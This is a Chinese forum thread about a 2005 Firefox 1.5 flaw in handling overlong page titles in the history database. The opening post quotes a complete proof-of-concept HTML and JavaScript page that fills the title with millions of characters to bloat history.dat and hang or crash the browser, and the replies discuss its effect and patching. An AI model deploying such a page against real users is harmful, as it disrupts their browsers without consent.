阅读:3901回复:10
Firefox 1.5恶意代码现身
Firefox也开始面临微软IE的尴尬局面--越来越多“安全”人士开始为Firefox找漏洞,这不,Packetstorm Security昨天刚刚公布了Firefox最新1.5版的缓存溢出漏洞恶意代码。
该代码利用Firefox 1.5历史数据库无法处理超长页面的Bug,采用该代码的网页将直接导致Firefox崩溃。 解决该漏洞的唯一方式--在Firefox启动前删除history.dat文件。“该隐患经过测试确实存在,目前尚未有任何补丁发布,”SANS Internet Storm Center的John Bambenek表示,“不过,该漏洞仅会导致Firefox崩溃,目前尚不会造成更多危害。” 以下是引用片段,仅供参考和学习测试: <html><head><title>heh</title><script type="text/javascript"> function ex() { var buffer = ""; for (var i = 0; i < 5000; i++) { buffer += "A"; } var buffer2 = buffer; for (i = 0; i < 500; i++) { buffer2 += buffer; } document.title = buffer2; } </script></head><body>ZIPLOCK says <a href="javascript:ex();">CLICK ME </a></body></html> |
|
|
1楼#
发布于:2005-12-09 12:50
点按钮时只是标题变成5000×500个A,没事
但是这是要写到“历史”里,history.dat里也就多了一堆00A$ 体积暴增…… 关掉FF再打开就要好久才能正常使用 |
|
|
2楼#
发布于:2005-12-09 12:50
没有太大危害,仅仅是要关掉再开才会体现出来,很久才能正常使用,崩溃倒不会
|
|
3楼#
发布于:2005-12-09 12:50
这有什么好尴尬的?
开源软件就是需要大家一起来发现问题和完善的 只有商业软件并且是某某大头才会有尴尬 |
|
4楼#
发布于:2005-12-09 12:50
刚把补丁打上。
|
|
5楼#
发布于:2005-12-09 12:50
这有什么好尴尬的? 不错 |
|
|
6楼#
发布于:2005-12-09 12:50
fx的使用者越多,漏洞就会逐渐显现出来。。
不可能有没漏洞的软件。。fx也一样。。 只是fx当初的宣传者,一直声称没有漏洞。。这种不负责任的宣传方式,也让很多人对fx产生了厌恶 |
|
7楼#
发布于:2005-12-09 12:50
楼上的从哪儿看到Mozilla说过FF没有漏洞了?
|
|
8楼#
发布于:2005-12-09 12:50
|
|
9楼#
发布于:2005-12-09 12:50
呵呵,楼上的很赞同微软出补丁的速度了
|
|
10楼#
发布于:2005-12-09 12:50
|
|